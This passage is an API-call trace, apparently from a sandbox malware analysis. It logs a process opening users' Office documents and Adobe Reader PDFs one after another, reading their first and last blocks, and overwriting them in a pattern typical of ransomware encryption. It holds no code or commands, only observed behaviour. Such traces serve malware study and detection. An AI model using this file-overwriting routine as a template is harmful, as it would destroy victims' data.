lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0xd6d5 [0062.875] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0062.875] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0062.875] ReleaseMutex (hMutex=0x168) returned 1 [0062.875] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="n8jJ7uBD.xlsx", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0062.875] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="n8jJ7uBD.xlsx", cchWideChar=13, lpMultiByteStr=0x1f734ec, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n8jJ7uBD.xlsx", lpUsedDefaultChar=0x0) returned 13 [0062.875] ReadFile (in: hFile=0x1dc, lpBuffer=0x2662a08, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2662a08*, lpNumberOfBytesRead=0x345f278*=0x4000, lpOverlapped=0x0) returned 1 [0062.876] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0xc6d5 [0062.877] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0062.877] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0xc6d5 [0062.877] WriteFile (in: hFile=0x1dc, lpBuffer=0x269e478*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x269e478*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0062.877] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0062.877] WriteFile (in: hFile=0x1dc, lpBuffer=0x2698418*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2698418*, lpNumberOfBytesWritten=0x345f28c*=0x4000, lpOverlapped=0x0) returned 1 [0062.878] CloseHandle (hObject=0x1dc) returned 1 [0062.879] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\N4DNLseE63Z.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\n4dnlsee63z.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0062.879] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0062.879] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x2161 [0062.879] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0062.880] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0062.880] ReleaseMutex (hMutex=0x168) returned 1 [0062.880] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="N4DNLseE63Z.docx", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0062.880] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="N4DNLseE63Z.docx", cchWideChar=16, lpMultiByteStr=0x1f88ba4, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N4DNLseE63Z.docx", lpUsedDefaultChar=0x0) returned 16 [0062.880] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0062.881] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x1161 [0062.881] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0062.881] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x1161 [0062.881] WriteFile (in: hFile=0x1dc, lpBuffer=0x269e578*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x269e578*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0062.882] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0062.882] WriteFile (in: hFile=0x1dc, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x345f28c*=0x1000, lpOverlapped=0x0) returned 1 [0062.882] CloseHandle (hObject=0x1dc) returned 1 [0062.883] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vLykOV4Y_3l2VkIHp\\l9h2RZXXX5kbGC\\nz7KgMH.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vlykov4y_3l2vkihp\\l9h2rzxxx5kbgc\\nz7kgmh.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0062.883] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0062.884] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x163ca [0062.884] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0062.884] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0062.884] ReleaseMutex (hMutex=0x168) returned 1 [0062.884] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nz7KgMH.doc", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0062.884] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nz7KgMH.doc", cchWideChar=11, lpMultiByteStr=0x1f734ec, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nz7KgMH.doc", lpUsedDefaultChar=0x0) returned 11 [0062.884] ReadFile (in: hFile=0x1dc, lpBuffer=0x2662a08, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2662a08*, lpNumberOfBytesRead=0x345f278*=0x4000, lpOverlapped=0x0) returned 1 [0062.885] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x153ca [0062.885] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0062.885] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x153ca [0062.886] WriteFile (in: hFile=0x1dc, lpBuffer=0x269e478*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x269e478*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0062.886] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0062.886] WriteFile (in: hFile=0x1dc, lpBuffer=0x2698418*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2698418*, lpNumberOfBytesWritten=0x345f28c*=0x4000, lpOverlapped=0x0) returned 1 [0062.886] CloseHandle (hObject=0x1dc) returned 1 [0062.889] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vLykOV4Y_3l2VkIHp\\21Ar6w3\\G5X-hwwH1l2TL.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vlykov4y_3l2vkihp\\21ar6w3\\g5x-hwwh1l2tl.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0062.890] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0062.890] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x461e [0062.890] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0062.890] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0062.890] ReleaseMutex (hMutex=0x168) returned 1 [0062.890] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="G5X-hwwH1l2TL.ods", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0062.890] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="G5X-hwwH1l2TL.ods", cchWideChar=17, lpMultiByteStr=0x1f88ba4, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="G5X-hwwH1l2TL.ods", lpUsedDefaultChar=0x0) returned 17 [0062.890] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0062.891] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x361e [0062.891] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0062.891] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x361e [0062.892] WriteFile (in: hFile=0x1dc, lpBuffer=0x269e578*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x269e578*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0062.892] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0062.892] WriteFile (in: hFile=0x1dc, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x345f28c*=0x1000, lpOverlapped=0x0) returned 1 [0062.892] CloseHandle (hObject=0x1dc) returned 1 [0062.899] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CZE\\AdobeID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\cze\\adobeid.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0062.900] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0062.900] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x16057 [0062.900] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0062.900] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0062.900] ReleaseMutex (hMutex=0x168) returned 1 [0062.900] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeID.pdf", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0062.900] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeID.pdf", cchWideChar=11, lpMultiByteStr=0x1f734ec, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdobeID.pdf", lpUsedDefaultChar=0x0) returned 11 [0062.900] ReadFile (in: hFile=0x1dc, lpBuffer=0x2662a08, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2662a08*, lpNumberOfBytesRead=0x345f278*=0x4000, lpOverlapped=0x0) returned 1 [0063.883] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x15057 [0063.883] ReadFile (in: hFile=0x1dc, lpBuffer=0x2691bb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0063.937] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x15057 [0063.937] WriteFile (in: hFile=0x1dc, lpBuffer=0x269c448*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x269c448*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0063.937] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0063.937] WriteFile (in: hFile=0x1dc, lpBuffer=0x1e980a8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesWritten=0x345f28c*=0x4000, lpOverlapped=0x0) returned 1 [0063.938] CloseHandle (hObject=0x1dc) returned 1 [0063.939] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\ESP\\AdobeID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\esp\\adobeid.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0063.940] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0063.940] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x109db [0063.940] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0063.940] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0063.940] ReleaseMutex (hMutex=0x168) returned 1 [0063.940] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeID.pdf", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0063.941] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeID.pdf", cchWideChar=11, lpMultiByteStr=0x1f7346c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdobeID.pdf", lpUsedDefaultChar=0x0) returned 11 [0063.941] ReadFile (in: hFile=0x1dc, lpBuffer=0x1e980a8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesRead=0x345f278*=0x4000, lpOverlapped=0x0) returned 1 [0063.964] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0xf9db [0063.964] ReadFile (in: hFile=0x1dc, lpBuffer=0x269d478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x269d478*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0063.975] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0xf9db [0063.976] WriteFile (in: hFile=0x1dc, lpBuffer=0x1ec3568*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ec3568*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0063.976] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0063.976] WriteFile (in: hFile=0x1dc, lpBuffer=0x1e980a8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesWritten=0x345f28c*=0x4000, lpOverlapped=0x0) returned 1 [0063.976] CloseHandle (hObject=0x1dc) returned 1 [0063.999] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\ITA\\AdobeID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\ita\\adobeid.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0064.000] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0064.000] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x10913 [0064.000] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0064.000] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0064.000] ReleaseMutex (hMutex=0x168) returned 1 [0064.000] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeID.pdf", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0064.000] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeID.pdf", cchWideChar=11, lpMultiByteStr=0x1f734ec, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdobeID.pdf", lpUsedDefaultChar=0x0) returned 11 [0064.000] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ec1538, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ec1538*, lpNumberOfBytesRead=0x345f278*=0x4000, lpOverlapped=0x0) returned 1 [0064.014] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0xf913 [0064.014] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0064.024] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0xf913 [0064.024] WriteFile (in: hFile=0x1dc, lpBuffer=0x269c448*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x269c448*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0064.024] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0064.024] WriteFile (in: hFile=0x1dc, lpBuffer=0x1ec1538*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ec1538*, lpNumberOfBytesWritten=0x345f28c*=0x4000, lpOverlapped=0x0) returned 1 [0064.024] CloseHandle (hObject=0x1dc) returned 1 [0064.055] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\NOR\\AdobeID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\nor\\adobeid.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0064.056] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0064.056] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x10956 [0064.056] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0064.056] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0064.056] ReleaseMutex (hMutex=0x168) returned 1 [0064.056] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeID.pdf", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0064.056] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeID.pdf", cchWideChar=11, lpMultiByteStr=0x1f7356c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdobeID.pdf", lpUsedDefaultChar=0x0) returned 11 [0064.056] ReadFile (in: hFile=0x1dc, lpBuffer=0x2662a08, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2662a08*, lpNumberOfBytesRead=0x345f278*=0x4000, lpOverlapped=0x0) returned 1 [0064.251] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0xf956 [0064.251] ReadFile (in: hFile=0x1dc, lpBuffer=0x2662a08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2662a08*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0064.251] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0xf956 [0064.259] WriteFile (in: hFile=0x1dc, lpBuffer=0x269e578*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x269e578*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0064.260] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, 